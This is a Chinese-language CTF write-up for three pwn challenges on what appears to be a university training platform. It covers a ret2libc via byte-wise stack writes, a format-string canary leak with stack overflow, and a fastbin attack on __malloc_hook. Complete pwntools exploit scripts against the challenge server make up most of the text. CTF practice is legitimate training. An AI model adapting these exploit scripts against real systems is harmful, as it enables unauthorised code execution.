偶然得到这个平台，发现是BIT的CTF平台，应该是平时的阶段性的训练题目。看了看题，其他方向的题目感觉都是入门题，但是pwn题目，发现还是比入门题难一点点的，来记录一下。

pwn1

　　栈上任意位置的读写操作，只能一字节一字节读写，算好偏移，还是挺好做的。

　　比较坑的是，远程的libc被改了，用one_gadgets打的时候，明明可以拿到shell，但是不给flag！真是可恶！！！

　　做题思路：泄露libc基地址，泄露pie程序基地址，把返回地址覆盖成pop_rdi，binsh，system，拿shell三连来拿到flag。

exp：

 1 from pwn import *
 2 
 3 #p = process('./pwn')
 4 p = remote('39.105.189.183',7005)
 5 #libc = ELF('./libc.so.6')
 6 libc = ELF('./libc-2.23.so')
 7 context.log_level = 'debug'
 8 
 9 p.sendafter('name:','bhxdn')
10 libc_base = ''
11 
12 #leak libc
13 for i in range(6):
14     p.sendlineafter('index\n',str(637-i))
15     temp = p.recvuntil('\n')[-3:-1]
16     libc_base += temp
17     temp = int(temp,16)
18     p.sendlineafter('value\n',str(temp))
19 
20 libc_base = int(libc_base,16)-240-libc.symbols['__libc_start_main']
21 print 'libc_base-->'+hex(libc_base)
22 system = libc_base+libc.symbols['system']
23 binsh = libc_base+libc.search('/bin/sh').next()
24 
25 #leak pie
26 pie = ''
27 for i in range(6):
28     p.sendlineafter('index\n',str(637-288-i))
29     temp = p.recvuntil('\n')[-3:-1]
30     pie += temp
31     temp = int(temp,16)
32     p.sendlineafter('value\n',str(temp))
33 pie = int(pie,16)-0x000B11
34 print 'pie-->'+hex(pie)
35 pop_rdi = pie+0x00d03
36 pop_rdi = str(hex(pop_rdi))
37 system = str(hex(system))
38 binsh = str(hex(binsh))
39 
40 for i in range(6):
41     p.sendlineafter('index\n',str(637-288-i))
42     a = (i+1)*2
43     temp = int(pop_rdi[a:a+2],16)
44     p.sendlineafter('value\n',str(temp))
45 for i in range(6):
46     p.sendlineafter('index\n',str(637-288-i+8))
47     a = (i+1)*2
48     temp = int(binsh[a:a+2],16)
49     p.sendlineafter('value\n',str(temp))
50 for i in range(6):
51     p.sendlineafter('index\n',str(637-288-i+16))
52     a = (i+1)*2
53     temp = int(system[a:a+2],16)
54     p.sendlineafter('value\n',str(temp))
55 
56 p.sendlineafter('index\n','0')
57 p.sendlineafter('value\n','a')
58 p.sendlineafter('no)? ','no')
59 p.interactive()
60 p.recv()
61 p.recv()

pwn2

　　32位程序，有栈溢出，有格式化字符串漏洞。

　　先利用格式化字符串漏洞泄露canary和libc基地址，然后覆盖返回地址，拿shell三连击！

 1 from pwn import *
 2 
 3 #p = process('./pwn2')
 4 libc = ELF('./libc-2.23_x86.so')
 5 p = remote('39.105.189.183',7006)
 6 context.log_level = 'debug'
 7 
 8 p.sendlineafter('me?[Y]\n','Y')
 9 p.sendlineafter('please:\n','%11$p-%27$p')
10 canary = int(p.recvuntil('-')[-11:-1],16)
11 libc_base = int(p.recv(10),16)-247-libc.symbols['__libc_start_main']
12 print 'canary-->'+hex(canary)
13 print 'libc_base-->'+hex(libc_base)
14 system = libc_base+0x03adb0
15 binsh = libc_base+0x15bb0b
16 system = libc_base+libc.symbols['system']
17 binsh = libc_base+libc.search('/bin/sh').next()
18 ret = 0x08048973
19 payload= 'a'*0x10+p32(canary)+'bbbb'*3+p32(ret)+p32(system)+p32(0)+p32(binsh)
20 p.send(payload)
21 p.interactive()

pwn3

　　pwn3是一道堆题目，增删查改四个功能都有。程序没有开启pie。

　　add：可以创建任意大小的堆块，其余漏洞没有了。（用的是malloc创建的堆块，创建时不会清理原来堆块的残余数据）

　　edit：没有任何问题，边界都控制的很好，也没有溢出。

　　show：没有任何问题。

　　delete：漏洞点就在delete函数中。发现对程序进行free的时候，没有检查边界。如果我们在堆上面伪造chunk指针，delete我们伪造的指针，就可以实现攻击。

　　做题思路：

　　1.通过创建0x80大小的堆块，再申请回来，show一下拿到libc基地址。

　　2.让unsortedbin链上有两个chunk，此时的一个chunk上的bk指针是指向另一个chunk的，bk存着堆地址，然后申请回来，show就可以得到堆的地址。

　　3.在堆上伪造一个chunk指针，指向一个chunk，利用delete函数的漏洞，对这个chunk进行free，此时在bss段还会有一个指向free的这个chunk的指针。这个chunk需要是0x68大小，free后是fastbins，也能申请到malloc_hook-0x23的位置。接下来就是改写fd指针，打malloc_hook，用realloc抬帧。

　　吐槽：还是libc问题，尝试了好多次，才找到一个可以用的偏移。

exp：

 1 from pwn import *
 2 
 3 p = process('./pwn')
 4 #p = remote('39.105.189.183',7007)
 5 elf = ELF('./pwn')
 6 context.log_level = 'debug'
 7 #libc = ELF('./libc.so.6')
 8 libc = ELF('./libc-2.23.so')
 9 
10 def duan():
11     gdb.attach(p)
12     pause()
13 def add(size,content):
14     p.sendlineafter('choice:','2')
15     p.sendlineafter('daily:',str(size))
16     p.sendafter('daily\n',content)
17 def show():
18     p.sendlineafter('choice:','1')
19 def edit(index,content):
20     p.sendlineafter('choice:','3')
21     p.sendlineafter('daily:',str(index))
22     p.sendafter('daily\n',content)
23 def delete(index):
24     p.sendlineafter('choice:','4')
25     p.sendlineafter('daily:',str(index))
26 
27 add(0x80,'aaaaaaaa')
28 add(0x80,'bbbbbbbb')
29 delete(0)
30 add(0x80,'aaaaaaaa')
31 show()
32 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.symbols['__malloc_hook']
33 print 'libc_base-->'+hex(libc_base)
34 add(0x10,'aaaaaaaa')
35 add(0x80,'zzzzzzzz')
36 add(0x10,'zzzzzzzz')
37 delete(1)
38 delete(3)
39 duan()
40 add(0x80,'aaaabbbb')
41 
42 show()
43 p.recvuntil('aaaabbbb')
44 heap_base = u64(p.recv(4).ljust(8,'\x00'))-0x140
45 print 'heap_base-->'+hex(heap_base)
46 add(0x80,'aaaaaaaa')
47 add(0x20,p64(0x70)+p64(heap_base+0x210+0x20))
48 add(0x68,'aaaaaaaa')
49 add(0x10,'zzzzzzzz')
50 offset = (heap_base+0x200-0x602060)/16
51 print 'offset-->'+str(offset)
52 delete(offset)
53 edit(1,'zzzzzzzz')
54 edit(6,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
55 add(0x68,'aaaaaaaa')
56 
57 #og = [0x45226,0x4527a,0xf0364,0xf1207]
58 og = [0x45216,0x4526a,0xf02a4,0xf1147]
59 shell = libc_base+og[1]
60 
61 print hex(libc_base+libc.symbols['__malloc_hook']-0x23)
62 realloc = libc_base+libc.symbols['realloc']
63 
64 #add(0x68,'a'*(0x13-0x8)+p64(shell)+p64(realloc+13))
65 add(0x68,'a'*(0x13-0x8)+p64(shell)+p64(realloc+6))
66 p.sendlineafter('choice:','2')
67 p.sendlineafter('daily:',str(0x10))
68 p.interactive()